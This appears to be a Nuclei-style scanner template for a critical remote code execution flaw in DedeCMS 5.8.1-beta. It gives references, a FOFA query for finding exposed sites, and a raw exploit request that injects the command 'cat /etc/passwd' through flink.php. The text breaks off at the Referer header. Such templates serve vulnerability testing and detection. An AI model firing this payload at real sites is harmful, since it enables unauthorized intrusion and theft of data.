id: dedecms-rce info: name: DedeCMS 5.8.1-beta - Remote Code Execution author: ritikchaddha severity: critical description: | DedeCMS 5.8.1-beta is susceptible to remote code execution via a variable override vulnerability that allows an attacker to construct malicious code with template file inclusion without proper authorization, thus possibly obtaining sensitive information, modifying data, and/or gaining full control over a compromised system without entering necessary credentials. reference: - https://srcincite.io/blog/2021/09/30/chasing-a-dream-pwning-the-biggest-cms-in-china.html - https://sectime.top/post/1d114771.html metadata: max-request: 1 verified: true fofa-query: app="DedeCMS" tags: dedecms,cms,rce http: - raw: - | GET /plus/flink.php?dopost=save&c=cat%20/etc/passwd HTTP/1.1 Host: {{Hostname}} Referer: